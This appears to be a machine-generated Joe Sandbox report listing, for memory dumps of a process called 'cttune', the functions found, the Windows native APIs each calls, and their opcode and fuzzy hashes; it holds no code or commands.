                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: aa5b5acd8abbe0bd029fab8f860ac050fbeb2719b49408f02d2951fb0ec98f8a
                                        • Instruction ID: efbc41a5eebeb3b21ca5f1b44b2515ddce8a13fe73c732199a94e4b031c98295
                                        • Opcode Fuzzy Hash: aa5b5acd8abbe0bd029fab8f860ac050fbeb2719b49408f02d2951fb0ec98f8a
                                        • Instruction Fuzzy Hash: 6531C3B5A01609ABCB04DF98D880EDFB7B9AF8D754F108209FE18A3340D770A951CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F277A0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F27875
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 34220ee38f308a7fed33c9f2c5f9644a2429779be642ef4234cc9850840e9688
                                        • Instruction ID: c4eae4ecedc3e5675d6ed87f8ba9a20c5cb0552e9c838b8cdd3573e7d99b3c71
                                        • Opcode Fuzzy Hash: 34220ee38f308a7fed33c9f2c5f9644a2429779be642ef4234cc9850840e9688
                                        • Instruction Fuzzy Hash: 9B31E8B5A00209ABCB14DF99DC80EEFB7B9EF8D754F104209FE18A7240D670A951CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F27A70 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(02F1135B,?,02F266E7,00000000,00000004,00003000,?,?,?,?,?,02F266E7,02F1135B,00000000,?,02F20131), ref: 02F27B27
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: 3ffb378070dab8e93afddde8d3c2a78da6782a5fc1188beb0034e38fe87abdb3
                                        • Instruction ID: 61111fb7239a1e5666798176fc36deb9f4a02c05fd8b36ab6fb97fd6eefcf5aa
                                        • Opcode Fuzzy Hash: 3ffb378070dab8e93afddde8d3c2a78da6782a5fc1188beb0034e38fe87abdb3
                                        • Instruction Fuzzy Hash: 59211BB5A01248ABDB14DF58DC81EEFB7ADEF89750F104609FE18A7280D770A950CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F27880 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: 4ee26d1f51ccccf557a87f90a4794a581092955ffd3521abe831b1de42ab0843
                                        • Instruction ID: 35fc85c3467f7077e83e854d03d0478d8cfd7a9dd9cf03f31e1ef31e204332ee
                                        • Opcode Fuzzy Hash: 4ee26d1f51ccccf557a87f90a4794a581092955ffd3521abe831b1de42ab0843
                                        • Instruction Fuzzy Hash: 1F01AD75A402187BE620EB64DC81FEBB7ADEB86750F500509FB08A7280D7B17914CBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02F27910 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F27944
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2f00000_cttune.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 185affe5397ec2be03daad944446bfef41dc645ac842470fdc446d53086dad78
                                        • Instruction ID: 47c4653e9f1ea70df2e3828033d10fddd7b6afb2159715322377ab4c50631d2f
                                        • Opcode Fuzzy Hash: 185affe5397ec2be03daad944446bfef41dc645ac842470fdc446d53086dad78
                                        • Instruction Fuzzy Hash: 90E086362006147BD610EB59DC40F9B776DEFC5754F518415FB08A7240CB71791487F5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3966b23ac910a1eb1f38d0d68e3a05c02fe180f8f0a146685fbbaf0fba3898c5
                                        • Instruction ID: b078f9f6bcdc677b2749077c8eb9e88aebfeb7078eea1a4e831541aee1c1c6aa
                                        • Opcode Fuzzy Hash: 3966b23ac910a1eb1f38d0d68e3a05c02fe180f8f0a146685fbbaf0fba3898c5
                                        • Instruction Fuzzy Hash: 429002616415015261407159890440660059BE1346395C119A0555560C8619D956926A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a31297618dfaa0e531f1ee5d974f448170ed5a0b0b549104084a378a4114f5c9
                                        • Instruction ID: 5d99bd0f207260dace87f6d1e76dc516d8e975993e5993adb8d25cc041fb6fec
                                        • Opcode Fuzzy Hash: a31297618dfaa0e531f1ee5d974f448170ed5a0b0b549104084a378a4114f5c9
                                        • Instruction Fuzzy Hash: 1D90023164580122B1407159898454640059BE0346B55C015E0425554C8A15DA575362
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8d079d7d07a8795639c5bc74691984f60318a4f58543ec9f0ce593cb06ead268
                                        • Instruction ID: 682f44056ddd0ca053cf77a199bd104ab30c18e43c62dbc0c9b172a02495a90a
                                        • Opcode Fuzzy Hash: 8d079d7d07a8795639c5bc74691984f60318a4f58543ec9f0ce593cb06ead268
                                        • Instruction Fuzzy Hash: 6490023124140512F1007599950864600058BE0346F55D015A5025555EC666D9926132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: fc2dd7415887c19532002156878bc9581a307b6598260c1dedc307b7cffcc932
                                        • Instruction ID: a61176f25c700d70f54546fa3a83fc56e9e16c91347759e74c61dcc28e164033
                                        • Opcode Fuzzy Hash: fc2dd7415887c19532002156878bc9581a307b6598260c1dedc307b7cffcc932
                                        • Instruction Fuzzy Hash: 5490023124148912F1107159C50474A00058BD0346F59C415A4425658D8696D9927122
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7ff374c3b5dd0988fdfde557027d41a058afa435d12908a022f66fbb606b251d
                                        • Instruction ID: 1004f3637bff204f4a3fa2770a7609fa700b3636c1aef3a19b1f404c0ff49726
                                        • Opcode Fuzzy Hash: 7ff374c3b5dd0988fdfde557027d41a058afa435d12908a022f66fbb606b251d
                                        • Instruction Fuzzy Hash: E490023124140952F10071598504B4600058BE0346F55C01AA0125654D8616D9527522
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5166bec523a0a958d5c0382f04890d4c919cc45d38d21bbb236ed6678913b92c
                                        • Instruction ID: 32163171a9b205dcc87856ce333cffedb78893c570b5b7d0e3fe83e6870545f3
                                        • Opcode Fuzzy Hash: 5166bec523a0a958d5c0382f04890d4c919cc45d38d21bbb236ed6678913b92c
                                        • Instruction Fuzzy Hash: F490023124140523F1117159860470700098BD0286F95C416A0425558D9657DA53A122
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 81951c400468f27c9730feae80dbd4e7b50fcb383fc3128fc5595d03abedacde
                                        • Instruction ID: adaac5f5e40c6831606e46ae062a10219b54eaf2418de57e2355d632e5dd0631
                                        • Opcode Fuzzy Hash: 81951c400468f27c9730feae80dbd4e7b50fcb383fc3128fc5595d03abedacde
                                        • Instruction Fuzzy Hash: CB900221282442627545B159850450740069BE0286795C016A1415950C8527E957D622
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 4f77fe8b527d01f48d578cdb4871efe7a6ded6ea5f80d97cbe44186031eea043
                                        • Instruction ID: 52c4f82896ba4f6746c8b3d5573cfaabde2e9094e13bdbc5b0f8a4332bcfb3f1
                                        • Opcode Fuzzy Hash: 4f77fe8b527d01f48d578cdb4871efe7a6ded6ea5f80d97cbe44186031eea043
                                        • Instruction Fuzzy Hash: 8090022134140113F140715995186064005DBE1346F55D015E0415554CD916D9575223
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 082d9d60fb32204803322924f71386755eac888c4d95a9e7b990d2ca6d7c0479
                                        • Instruction ID: 397c256f0bcc26b0df29146b911c1a7831423c289df0d5ce8976a64380b0f501
                                        • Opcode Fuzzy Hash: 082d9d60fb32204803322924f71386755eac888c4d95a9e7b990d2ca6d7c0479
                                        • Instruction Fuzzy Hash: 7690022925340112F1807159950860A00058BD1247F95D419A0016558CC916D96A5322
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: add5ac57bbcae3eb98a7562e70412f34511727d66d39469ecbf99db47a474f99
                                        • Instruction ID: 3838b182ddae73100b7e03ea011540ff022fa00a038e027f6cae2ccf75999aff
                                        • Opcode Fuzzy Hash: add5ac57bbcae3eb98a7562e70412f34511727d66d39469ecbf99db47a474f99
                                        • Instruction Fuzzy Hash: 0A90026124180513F1407559890460700058BD0347F55C015A2065555E8A2ADD526136
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b0a2db1eef21d98a3229685ca9a9669d0552702762ecbd00263b1b7d4fadc035
                                        • Instruction ID: c89f5816126e72a24cd342130855a1c48667181bf59e56026fcd01bdbb14e373
                                        • Opcode Fuzzy Hash: b0a2db1eef21d98a3229685ca9a9669d0552702762ecbd00263b1b7d4fadc035
                                        • Instruction Fuzzy Hash: AA90022164140612F10171598504616000A8BD0286F95C026A1025555ECA26DA93A132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b76e688f25dfea69687a1f93cf029a825da4310248dbbc70fa0818a9187b32a1
                                        • Instruction ID: 0f9e70bea599fcb428049b66d32e65ac46964d4e0e52a8849c0043f4ad6ad424
                                        • Opcode Fuzzy Hash: b76e688f25dfea69687a1f93cf029a825da4310248dbbc70fa0818a9187b32a1
                                        • Instruction Fuzzy Hash: B2900221251C0152F20075698D14B0700058BD0347F55C119A0155554CC916D9625522
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 9fc83db44471a9ef3241317d2e8f3d027024c178086055293b12e12438a7ae32
                                        • Instruction ID: eb3206f79a1a46c593a4b1a94c6427fb9aeb434c1e098c2aeffc541c2868b285
                                        • Opcode Fuzzy Hash: 9fc83db44471a9ef3241317d2e8f3d027024c178086055293b12e12438a7ae32
                                        • Instruction Fuzzy Hash: 269002216414015261407169C9449064005AFE1256755C125A0999550D855AD9665666
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 0b5149af949929f9c2bb347d2c5a35bc7b4b777284f3806bfede6cb42d6145c9
                                        • Instruction ID: 9b269ff069972e32e510657ca4db7c76e523121b98f4555ee494f3dc0d7eec56
                                        • Opcode Fuzzy Hash: 0b5149af949929f9c2bb347d2c5a35bc7b4b777284f3806bfede6cb42d6145c9
                                        • Instruction Fuzzy Hash: 9990026138140552F10071598514B060005CBE1346F55C019E1065554D861ADD536127
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3e81203fb48b45bf486d256735c09a8fde24300eb112f876b1c9d9e6090a5547
                                        • Instruction ID: 2f82e68819f619de2cc95ffc5970dfd41385c0f1e3cdab5e568c7f038f4676d2
                                        • Opcode Fuzzy Hash: 3e81203fb48b45bf486d256735c09a8fde24300eb112f876b1c9d9e6090a5547
                                        • Instruction Fuzzy Hash: 09900225261401122145B559470450B04459BD6396395C019F1417590CC622D9665322
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 9c95220f8c285ef486e17d1e871c3e2daf2c5cd6f2d353b67f52fa931f03c8cc
                                        • Instruction ID: 535337380cfd60be98480a1b1c391ce629eb56c91962aae787a103c84154c9d3
                                        • Opcode Fuzzy Hash: 9c95220f8c285ef486e17d1e871c3e2daf2c5cd6f2d353b67f52fa931f03c8cc
                                        • Instruction Fuzzy Hash: 07900225251401132105B559470450700468BD5396355C025F1016550CD622D9625122
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 16b531210cbd11e8014dfe0f805803a20c3d92a8c19a46566d4938541c379c54
                                        • Instruction ID: fd80ef3ca48d60ca2222648cf4e436f2a943f2975b0e4759f4e524e71e27d6f2
                                        • Opcode Fuzzy Hash: 16b531210cbd11e8014dfe0f805803a20c3d92a8c19a46566d4938541c379c54
                                        • Instruction Fuzzy Hash: F590023124140912F1807159850464A00058BD1346F95C019A0026654DCA16DB5A77A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_4f40000_cttune.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8bfd358b01f7e66356c395c2c7aed4b9e319ee9c572ee40f6136c7004de3be0e
                                        • Instruction ID: a39b8fc9e9ee8654d670d1a0cce94e285777a1d7d28a5792e7917a35198c6e0a
                                        • Opcode Fuzzy Hash: 8bfd358b01f7e66356c395c2c7aed4b9e319ee9c572ee40f6136c7004de3be0e
                                        • Instruction Fuzzy Hash: 4190023124544952F14071598504A4600158BD034AF55C015A0065694D9626DE56B662
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04FB2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F40000, based on PE: true
                                        • Associated: 0000000E.00000002.2602332777.0000000005069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.000000000506D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
